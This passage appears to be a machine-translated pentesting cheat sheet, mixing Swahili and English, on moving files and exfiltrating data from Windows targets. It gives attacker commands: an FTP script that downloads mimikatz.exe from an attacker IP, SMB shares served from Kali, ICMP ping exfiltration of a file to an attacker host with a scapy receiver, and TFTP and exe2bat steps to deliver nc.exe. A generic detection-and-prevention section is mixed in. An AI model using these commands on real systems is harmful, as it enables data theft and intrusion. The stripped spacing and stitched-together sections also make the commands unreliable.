#Run the following script to configure the FTP server#!/bin/bashgroupaddftpgroupuseradd-gftpgroup-d/dev/null-s/etcftpuserpure-pwduseraddfusr-uftpuser-d/ftphomepure-pwmkdbcd/etc/pure-ftpd/auth/ln-s../conf/PureDB60pdbmkdir-p/ftphomechown-Rftpuser:ftpgroup/ftphome//etc/init.d/pure-ftpdrestart
Mteja wa Windows
#Work well with python. With pure-ftp use fusr:ftpechoopen10.11.0.4121>ftp.txtechoUSERanonymous>>ftp.txtechoanonymous>>ftp.txtechobin>>ftp.txtechoGETmimikatz.exe>>ftp.txtechobye>>ftp.txtftp-n-v-s:ftp.txt
SMB
Kali kama server
kali_op1>impacket-smbserver-smb2supportkali`pwd`# Share current directorykali_op2>smbserver.py-smb2supportname/path/folder# Share a folder#For new Win10 versionsimpacket-smbserver-smb2support-usertest-passwordtesttest`pwd`
Au unaweza kuunda smb share kwa kutumia samba:
apt-getinstallsambamkdir/tmp/smbchmod777/tmp/smb#Add to the end of /etc/samba/smb.conf this:[public]comment=SambaonUbuntupath=/tmp/smbreadonly=nobrowsable=yesguestok=Yes#Start sambaservicesmbdrestart
Exfiltration Techniques on Windows
Exfiltration Over C2 Channels
When exfiltrating data over command and control (C2) channels, an attacker can leverage existing C2 infrastructure to blend in with legitimate traffic. This can include using encrypted channels, steganography, or other obfuscation techniques to avoid detection.
Exfiltration Over Alternative Protocols
Attackers can also exfiltrate data using alternative protocols such as DNS, ICMP, or HTTP. By encoding data within the protocol traffic, an attacker can bypass network security controls that may only be inspecting specific protocols.
Exfiltration Over Trusted Protocols
Utilizing trusted protocols like HTTPS or DNS can help an attacker blend in with normal network traffic. By abusing these protocols to exfiltrate data, an attacker can avoid raising suspicion from security monitoring tools.
Exfiltration Over Encrypted Channels
Encrypting exfiltrated data can help evade detection by security tools that are not able to inspect encrypted traffic. By using encryption, an attacker can make it more challenging for defenders to identify and block exfiltration attempts.
CMD-Wind> \\10.10.14.14\path\to\exeCMD-Wind>netusez: \\10.10.14.14\test/user:testtest#For SMB using credentialsWindPS-1>New-PSDrive-Name"new_disk"-PSProvider"FileSystem"-Root"\\10.10.14.9\kali"WindPS-2>cdnew_disk:
Exfiltration is the unauthorized transfer of data from a target. This can be achieved through various methods, such as:
Email: Sending sensitive data as email attachments.
FTP: Transferring data using File Transfer Protocol.
DNS: Sending data through DNS requests.
HTTP/HTTPS: Using HTTP or HTTPS protocols to exfiltrate data.
Steganography: Hiding data within other files to avoid detection.
Physical: Removing data physically from a target location.
Detection
Detecting exfiltration can be challenging due to the covert nature of the activity. Some common detection methods include:
Network Monitoring: Monitoring network traffic for unusual patterns.
Endpoint Monitoring: Monitoring endpoint devices for unauthorized data transfers.
Data Loss Prevention (DLP): Using DLP solutions to detect and prevent data exfiltration.
Behavioral Analytics: Analyzing user behavior to identify suspicious activities.
Encryption: Implementing encryption to protect data from being exfiltrated.
Prevention
Preventing exfiltration requires a multi-layered approach to security. Some prevention techniques include:
Access Control: Limiting access to sensitive data to authorized personnel only.
Network Segmentation: Segmenting networks to prevent lateral movement of attackers.
User Training: Educating users about the risks of data exfiltration and how to prevent it.
Security Policies: Implementing strict security policies to govern data handling practices.
Security Tools: Deploying security tools such as firewalls, IDS/IPS, and SIEM solutions to detect and prevent exfiltration attempts.
By understanding exfiltration techniques and implementing appropriate detection and prevention measures, organizations can better protect their data from unauthorized access and transfer.
# To exfiltrate the content of a file via pings you can do:xxd-p-c4/path/file/exfil|whilereadline; doping-c1-p $line <IPattacker>; done#This will 4bytes per ping packet (you could probably increase this until 16)
from scapy.all import*#This is ippsec receiver created in the HTB machine Mischiefdefprocess_packet(pkt):if pkt.haslayer(ICMP):if pkt[ICMP].type ==0:data = pkt[ICMP].load[-4:]#Read the 4bytes interestingprint(f"{data.decode('utf-8')}", flush=True, end="")sniff(iface="tun0", prn=process_packet)
SMTP
Ikiwa unaweza kutuma data kwa seva ya SMTP, unaweza kuunda SMTP kupokea data hiyo kwa kutumia python:
sudopython-msmtpd-n-cDebuggingServer:25
TFTP
Kwa chaguo-msingi katika XP na 2003 (katika mingine inahitaji kuongezwa wazi wakati wa usakinishaji)
Katika Kali, anzisha seva ya TFTP:
#I didn't get this options working and I prefer the python optionmkdir/tftpatftpd--daemon--port69/tftpcp/path/tp/nc.exe/tftp
VBScript ni lugha ya programu inayotumika sana kwa maendeleo ya skripti za Windows. Inaweza kutumika kwa ufanisi kutekeleza shughuli za uhamishaji wa data kwa njia ya exfiltration.
Programu ya debug.exe sio tu inaruhusu ukaguzi wa binaries lakini pia ina uwezo wa kujenga upya kutoka hex. Hii inamaanisha kwamba kwa kutoa hex ya binary, debug.exe inaweza kuzalisha faili ya binary. Hata hivyo, ni muhimu kuzingatia kwamba debug.exe ina kizuizi cha kuunda faili hadi 64 kb in size.
# Reduce the sizeupx-9nc.exewineexe2bat.exenc.exenc.txt
Kisha nakili na ushirikishe maudhui kwenye windows-shell na faili inayoitwa nc.exe itaundwa.